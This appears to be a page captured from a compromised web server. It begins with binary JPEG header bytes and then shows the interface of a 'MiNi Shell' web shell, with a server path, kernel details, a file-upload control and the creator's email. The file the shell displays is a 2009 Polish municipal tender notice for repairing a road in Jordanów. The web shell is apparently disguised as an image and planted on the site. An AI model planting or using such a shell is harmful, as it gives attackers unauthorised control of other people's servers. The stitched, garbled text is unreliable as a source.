JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090403/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090403/90222-N-2009.html

<p class="kh_header"><b>Jordanów: Remont drogi gminnej Dydowa w Toporzysku długości 200 m od km 0 + 440 do km 0 + 640 realizowanej w ramach usuwania skutków powodzi roku 2007.</b><br>
<b>Numer ogłoszenia: 90222 - 2009; data zamieszczenia: 03.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jordanów , ul. Rynek 2, 34-240 Jordanów, woj. małopolskie, tel. 018 2693510, faks 018 2693526.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www: gmina-jordanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi gminnej Dydowa w Toporzysku długości 200 m od km 0 + 440 do km 0 + 640 realizowanej w ramach usuwania skutków powodzi roku 2007..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje :
- wykonanie robót ziemnych, oczyszczenie rowów  i przepustów z namułu
- założenie ścieków z elementów betonowych oraz kratę stalową przejazdową
- wyrównanie i zagęszczanie podbudowy warstwy dolnej z kruszywa łamanego grubości 10 cm
- wyrównanie i zagęszczanie podbudowy warstwy górnej z kruszywa łamanego grubości 10 cm
- plantowanie skarp
- założenie korytek ściekowych   na odcinku 200 m
- wykonanie nawierzchni mineralno-asfaltowej po zagęszczeniu  6 i 4 cm   
3/ Szczegółowy zakres prac obejmuje 
   a)  przedmiar robót
   b) szczegółowe specyfikacje techniczne)
   4/ Roboty  należy prowadzić zgodnie z przepisami Prawa budowlanego, dokumentacją techniczną, 
    specyfikacją techniczną wykonania i odbioru robót, przepisami BHP.
5/ Wykonawca dostarczy wszystkie materiały i urządzenia niezbędne do wykonania zamówienia, przez oznaczenie w 
    dokumentacji technicznej i przedmiarze robót producenta i nazwy należy rozumieć jako możliwość użycia przez 
    Wykonawcę materiałów  i urządzeń takich lub równoważnych o parametrach nie gorszych od zaprojektowanych po 
    uzgodnieniu z Zamawiającym.
6/ Wykonawca zobowiązany jest wskazać część zamówienia, którą zamierza  zlecić podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunki udziału w postępowaniu

W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   
     ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzą i doświadczenie oraz dysponują  potencjałem technicznym  
    i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do   
    udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Sposób dokonania oceny spełnienia warunków z pkt . 1:
ad. 1) warunek spełnią wykonawcy, którzy prowadzą działalność gospodarczą zgodną z przedmiotem zamówienia,
ad. 2) warunek spełnią wykonawcy, którzy w okresie ostatnich pięciu lat przed wszczęciem postępowania wykonali 
          należycie minimum jedną robotę odpowiadającą swoim rodzajem i wartością pracom stanowiącym przedmiot 
          zamówienia i posiadają dokumenty (referencje) potwierdzające, że roboty te zostały wykonane należycie.
          Dysponują osobą z posiadanymi uprawnieniami budowlanymi w specjalności :
          - budownictwa drogowego oraz posiada aktualne zaświadczenie przynależności do Okręgowego Związku
          Zawodowego, w oparciu o art.  6 ust.1  ustawy z 15.12. 2000 r.
ad. 3) warunek ten spełnią Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową w wysokości  
          zapewniającej wykonanie przedmiotu zamówienia i złożą stosowne oświadczenie w tym zakresie,
ad. 4) warunek spełnią wykonawcy, którzy załączą oświadczenie o spełnieniu warunków udziału w postępowaniu

          i dokumenty wymienione w pkt. 2. 
 

Uwaga:
Zamawiający wykluczy z postępowania Wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem, sądu wydanym w okresie 3 lat przed wszczęciem postępowania  oraz jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2.Dokumenty wymagane w postępowaniu:
Wykonawca zobowiązany jest złożyć w terminie wskazanym w Części VII pkt . 1 i formie określonej w Części VI SIWZ:

1) Ofertę na formularzu oferty, o  treści zgodnej z określoną we wzorze - stanowiącym 
    załącznik Nr 1  do SIWZ
2) Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
 a) Dokument potwierdzający dopuszczenie Wykonawcę do obrotu prawnego w  
         zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo 
         aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione  
         nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)Oświadczenie  o treści określonej w art. 22 ust. 1 oraz art. 24 ust. 1  i 2  ustawy prawo zamówień publicznych - wg wzoru  określonego w załączniku Nr 2 do SIWZ oraz
c) Oświadczenie o treści określonej w złączniku nr 2a,
d)Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawianych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)Aktualną informację z Krajowego Rejestru Karnego albo równoważnego  
    zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia    
    osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionych nie  
    wcześniej niż 6  miesięcy przed upływem terminu składania ofert;
e)Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
   ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem    
   terminu składania ofert;
f)Wykaz co najmniej jednej roboty  w ciągu ostatnich pięciu 
  lat,  a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie  będącej 
  przedmiotem zamówienia, z podaniem ich wartości   oraz daty    wykonania oraz odbiorów 
  wraz  z załączeniem dokumentów potwierdzających, że  roboty te zostały wykonane należycie   
  - wg  wzoru stanowiącego załącznik Nr 3 ,
g)Wykaz osób , którymi dysponuje lub będzie  dysponował  Wykonawca i które będą  
   uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji 
   zawodowych w    wykonaniu  zamówienia wraz z załącznikami uprawnieniami   
   i aktualnym zaświadczeniem o  przynależności do Okręgowej Izby 
  Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy z dnia 15  grudnia 2000r o 
  samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz.U. z  2001r, Nr 5,  
  poz.42  ze  zm.) - wg wzoru stanowiącego załącznik Nr 4.
  Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
  zamówienia, jeżeli w wykazie, o którym mowa w tym punkcie, wykonawca wskazał osoby, 
  którymi będzie dysponował załączniki  nr 4a i 4b
   Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, 
   jeżeli wykaże minimum po 1 osobie posiadającej uprawnienia do kierowania robotami o 
   specjalności drogowej ,
h) kopie polisy ubezpieczenia od odpowiedzialności cywilnej w związku z prowadzoną 
    działalnością.

Uwaga:
Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej  Polskiej powinien złożyć dokumenty  zgodnie  z  § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 7 kwietnia 2004 r ( D. U. z  2004, Nr 71,poz. 646 )

3) Parafowany wzór umowy jako akceptacji jej treści i warunków wg załącznika Nr 5 do SIWZ.
4) kosztorys ofertowy zgodny z podanym przedmiarem robót..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www: gmina-jordanow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jordanowie
ul. Rynek 2
34-240 Jordanów
pokój nr 12, II piętro za cenę 15 zł, w godzinach od 7:30 do 15:30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 10:00, miejsce: Urząd Gminy w Jordanowie
ul.Rynek 2
34-240 Jordanów
pokój nr 12, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com